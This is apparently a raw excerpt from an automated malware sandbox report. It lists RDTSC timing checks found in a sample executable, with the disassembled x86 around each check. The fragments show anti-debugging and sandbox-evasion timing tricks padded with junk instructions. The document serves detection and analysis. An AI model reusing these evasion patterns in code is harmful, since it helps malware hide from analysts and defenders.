                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7A4AA second address: E7A4B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4BA0D3F156h 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7A632 second address: E7A638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7A638 second address: E7A653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4BA0D3F162h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7A653 second address: E7A65D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4BA0D39706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E7A792 second address: E7A7A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EAAB69 second address: EAAB6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EAAB6D second address: EAAB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39711h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EAAB86 second address: EAAB8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EAAB8A second address: EAAB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EAB16C second address: EAB198 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F4BA0D3F164h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4BA0D3F160h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EAB198 second address: EAB19C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EABD28 second address: EABD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EABD2E second address: EABD32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EABD32 second address: EABD36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EABD36 second address: EABD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EABD3F second address: EABD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Ah 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F4BA0D3F156h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EB4EC7 second address: EB4EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D39718h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EB4EE3 second address: EB4EE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EB4EE9 second address: EB4F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F4BA0D3970Eh 0x0000000c jno 00007F4BA0D39706h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jg 00007F4BA0D39706h 0x0000001d popad 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EB4F0A second address: EB4F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EB4F16 second address: EB4F2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39712h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EB50AF second address: EB50BE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EB50BE second address: EB50D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 ja 00007F4BA0D39708h 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EBFB6F second address: EBFB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F4BA0D3F156h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EBFB7E second address: EBFB82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EBFE17 second address: EBFE25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EC04ED second address: EC04F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EC04F1 second address: EC04F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EC12F5 second address: EC1321 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4BA0D39726h 0x00000008 jmp 00007F4BA0D3970Dh 0x0000000d jmp 00007F4BA0D39713h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EC1321 second address: EC1327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EBF2F6 second address: EBF305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F4BA0D39706h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EBF305 second address: EBF30B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EBF30B second address: EBF311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EC685B second address: EC686C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3F156h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EC6B1D second address: EC6B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F4BA0D39706h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EC6B2D second address: EC6B31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED10D2 second address: ED10D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED10D6 second address: ED10DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED10DA second address: ED10EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D3970Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED10EF second address: ED10F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED10F3 second address: ED1109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39712h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED1109 second address: ED110F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED2BE2 second address: ED2BE7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED2BE7 second address: ED2BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 js 00007F4BA0D3F15Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED2D3B second address: ED2D5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39714h 0x00000008 jnc 00007F4BA0D39706h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED534C second address: ED5352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED5352 second address: ED5356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED54CE second address: ED54DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F4BA0D3F156h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED54DB second address: ED54E5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4BA0D3970Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED54E5 second address: ED54F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F4BA0D3F15Ch 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED9D18 second address: ED9D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jmp 00007F4BA0D3970Ch 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED9D34 second address: ED9D3E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED9D3E second address: ED9D45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EDF19E second address: EDF1B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F4BA0D3F158h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E08CF1 second address: E08CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EE8867 second address: EE8882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F4BA0D3F156h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EE8882 second address: EE8886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EEF95D second address: EEF964 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EEE31B second address: EEE325 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3970Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EF4081 second address: EF408C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F4BA0D3F156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F00124 second address: F00134 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4BA0D39706h 0x00000008 jo 00007F4BA0D39706h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F00134 second address: F0016E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jmp 00007F4BA0D3F165h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4BA0D3F166h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F0D65B second address: F0D65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F2549A second address: F254A4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4BA0D3F172h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F24524 second address: F24536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Dh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F24679 second address: F24681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F2493F second address: F24945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F24945 second address: F24949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F24D77 second address: F24D9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39716h 0x0000000d jng 00007F4BA0D39706h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F24EC3 second address: F24EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F4BA0D3F166h 0x0000000f pop eax 0x00000010 jc 00007F4BA0D3F15Eh 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 je 00007F4BA0D3F156h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jp 00007F4BA0D3F156h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F24EFE second address: F24F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jne 00007F4BA0D3970Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F2519E second address: F251A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F251A2 second address: F251C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39716h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F4BA0D39706h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F26B57 second address: F26B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F26B5D second address: F26B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Bh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F28388 second address: F2838E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F2823A second address: F28240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F2ABD3 second address: F2ABD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F2C4BD second address: F2C4F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39716h 0x00000007 jmp 00007F4BA0D39717h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F4BA0D39706h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E50EC5 second address: E50EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53702BC second address: 53702D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39711h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53702D1 second address: 53702EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53702EF second address: 53702F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53702F5 second address: 5370338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4BA0D3F167h 0x00000009 sbb cl, 0000000Eh 0x0000000c jmp 00007F4BA0D3F169h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a mov bx, si 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5370338 second address: 5370374 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 66419DA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4BA0D39712h 0x0000000f add ch, FFFFFFB8h 0x00000012 jmp 00007F4BA0D3970Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov edx, dword ptr [ebp+0Ch] 0x0000001c pushad 0x0000001d pushad 0x0000001e mov dh, cl 0x00000020 push edi 0x00000021 pop eax 0x00000022 popad 0x00000023 pushad 0x00000024 mov ax, dx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53906A1 second address: 53906B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53906B0 second address: 53906DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39719h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov bl, cl 0x0000000d mov di, 59FCh 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53906DC second address: 5390706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F4BA0D3F15Dh 0x0000000a and si, A556h 0x0000000f jmp 00007F4BA0D3F161h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5390706 second address: 539076D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39717h 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e jmp 00007F4BA0D39712h 0x00000013 xchg eax, esi 0x00000014 jmp 00007F4BA0D39710h 0x00000019 push eax 0x0000001a jmp 00007F4BA0D3970Bh 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4BA0D39715h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 539076D second address: 53907CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4BA0D3F15Ch 0x00000013 add si, D5C8h 0x00000018 jmp 00007F4BA0D3F15Bh 0x0000001d popfd 0x0000001e mov di, si 0x00000021 popad 0x00000022 nop 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F4BA0D3F15Eh 0x0000002c sub cx, D828h 0x00000031 jmp 00007F4BA0D3F15Bh 0x00000036 popfd 0x00000037 rdtsc
